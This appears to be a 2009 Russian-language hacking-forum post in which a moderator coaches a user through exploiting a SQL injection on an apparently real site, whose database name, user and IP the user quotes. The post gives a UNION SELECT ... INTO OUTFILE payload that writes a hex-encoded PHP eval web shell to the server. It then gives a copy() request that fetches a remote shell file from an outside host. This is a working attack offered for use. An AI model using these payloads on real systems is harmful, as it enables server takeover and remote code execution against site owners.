21.11.2009, 10:54
|
|
Moderator - Level 7
Регистрация: 19.12.2008
Сообщений: 1,203
Провел на форуме:
5011696
Репутация:
2221
|
|
Сообщение от B1t.exe
ElteRUS
ого )) спасибо. получил точно такое:
'4.1.22/cctvline_dbb/cctvline_cctv@212.193.224.223''
Не хочу выгядеть тупым, но не знаю я парвильно думаю?
4.1.22 - version
cctvline_dbb - database
cctvline_cctv@212.193.224.223 - user ?? (хотя тут не очень понимаю как так)
а что косается таблиц и столбцов - откуда унали, что сушествует таблица admin?
получается, что blind SQL ?
а есть ман какой-то? как вообше подбираеться столбцы(таблицы)..?
Если file_priv = Y.
Найди полный путь.
Потому
То http://www.ru/vn84.php?id=-1+union+select+null,null,null,null,null,null,null, null,null,null,null,null,0x3C3F206576616C28245F524 551554553545B635D293B203F3E,null,null+INTO+OUTFILE +'/полный/путь/inaex.php'--+
Далее если всё норм.
Нужно allow_url_fopen = on.
?с=copy($_GET[a], $_GET[b]);&a=http://site/shell.txt&b=inbex.php
(Да да inbex.php)
|
|
|